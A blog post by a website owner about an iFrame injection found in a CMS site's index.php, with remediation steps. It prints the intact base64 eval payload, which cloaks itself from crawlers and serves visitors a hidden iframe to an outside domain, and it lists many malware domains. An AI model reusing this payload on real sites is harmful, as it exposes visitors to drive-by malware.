Wordress, Joomla, Drupal and other sites were hacked: iFrame Injection Attack

I just found the following code in the index.php file located at root or \htdocs\ folder:

eval(base64_decode('ZXJyb3JfcmVwb3J0000aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly9keGFkaXlnLmNvLnR2Lz9nbz0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2lmcmFtZT4nOw0KfQ=='));

Using a base64 decoder, the code was deciphered:

error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
	array("216.239.32.0","216.239.63.255"),
	array("64.68.80.0"  ,"64.68.87.255"  ),
	array("66.102.0.0",  "66.102.15.255"),
	array("64.233.160.0","64.233.191.255"),
	array("66.249.64.0", "66.249.95.255"),
	array("72.14.192.0", "72.14.255.255"),
	array("209.85.128.0","209.85.255.255"),
	array("198.108.100.192","198.108.100.207"),
	array("173.194.0.0","173.194.255.255"),
	array("216.33.229.144","216.33.229.151"),
	array("216.33.229.160","216.33.229.167"),
	array("209.185.108.128","209.185.108.255"),
	array("216.109.75.80","216.109.75.95"),
	array("64.68.88.0","64.68.95.255"),
	array("64.68.64.64","64.68.64.127"),
	array("64.41.221.192","64.41.221.207"),
	array("74.125.0.0","74.125.255.255"),
	array("65.52.0.0","65.55.255.255"),
	array("74.6.0.0","74.6.255.255"),
	array("67.195.0.0","67.195.255.255"),
	array("72.30.0.0","72.30.255.255"),
	array("38.0.0.0","38.255.255.255")
	);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
	if ($my_ip2long >= $first_d && $my_ip2long < = $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
	if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<  i fra-me ---removed code for security>';
}

Here are Recent Domains Used by the Malware:

jfgjfr5jdfj.vv.cc, gdsagw3hgsrh.co.cc, jfgdhdfhsdfh.vv.cc, vfsgsh4hxfh.co.cc, ktk4gj.co.cc, gasgshshdh.co.cc, gewherhfdh.co.cc, h345jdfhfchf.co.cc, g2hsjgjgfj.co.cc, hfdhe3hjdf.co.cc, ns34jgdmhfm.co.cc, wrag23hdjsg.co.cc, ds23gfdshgfnf.co.cc, gdsg3whfshf.co.cc, hbsfhwerbxn.co.cc, hfdshwhfh3g.co.cc, gsdgwe3gfnx.co.cc, 3gshsddh.co.cc, hdh4hfdhf.co.cc, gsg3wahfh.co.cc, gsgwsgdsgg.co.cc, ktdi5ejytdjy.co.cc, hdfshtrehsht.co.cc, gdsg34gdsgf.co.cc, gsg3gsgfdsg.co.cc, gagdsgewg.co.cc, ghdsg32hgdf.co.cc, g232sgd.co.cc, fg2fsfsdvg.co.cc, hfdah4hdfhgf.co.cc, dfahwhh4hfh.co.cc, gsagddgsg.co.cc, mghmrm.co.cc, bfda3wgfdhf.co.cc, hfdsh34hdhfg.co.cc, gsdfaghw3hgsfd.co.cc, hfdahwhfdhfgdh.co.cc, hfdsah34hh.co.cc, euy0.co.cc, p6ox.co.cc, 71pp.co.cc, 2d7d.co.cc, uxqt.co.cc, f2hl.co.cc, s4gs.cz.cc, 9rk1.co.cc, gtha.co.cc, icu2.co.cc, fsfbv4gdgdg.cz.cc, v934.co.cc, ghtt5rgff.cz.cc, f9tq.cz.cc, gdfkwiksdk.cz.cc, hdfs4hwdhdf.cz.cc, psyzbq.cz.cc, sdgw3gsdg.vv.cc, 8ieq1w0.cz.cc, gs4gshshfs.vv.cc, gsdha3whfh.vv.cc, bxhbawhgsdfhzwre.vv.cc, geg3gsgdwd.cz.cc, gvonlxto1fj.cz.cc, 023uik6fj8.cz.cc, aixfbap7xo.co.cc, 1og0r6uz0hu.cz.cc, da3gwdgsdg.cz.cc, k74yq3zdgw.co.cc, utjtnw91jy.co.cc, sdfgsdfgsdf.co.cc, jd52b9rz6h.co.cc, 5jeuzfn9la.cz.cc, wgrgwozso9.co.cc, llhquzvvp0.co.cc, gwvmloqs.co.cc, oxvz.co.cc, 7ujj.co.cc, 6p58.co.cc, tapgjiuo.co.cc, y58z.co.cc, fvnv.co.cc, gmmidoet.co.cc, sa1o.co.cc, brliimuc.co.cc, bcmc.co.cc, s5t6.co.cc

First attempt, I edited the index.php and fix it! Remove the eval-line.
I reset my password and remove all ftp users.
But within two hours the index-files where hacked again.

Next attempt.
..edited the index.php, remove the eval-line.
I reset my password.
Then, I changed the file permission to 444, so any write permission won’t be allowed. Hope it will stop injecting code through backdoor script that may be existing inside my files.

Update after 8 hours:
No sign of code injection attack

UPDATE: After two weeks, I revert back the file permission and no more sign of malicious code injections

You might be interested to check:

Leave a comment:

Incoming search terms:

  • lee min ho wallpaper 2012
  • lee min hoo
  • lee min-ho 2011
  • how to remove injected iframe in drupal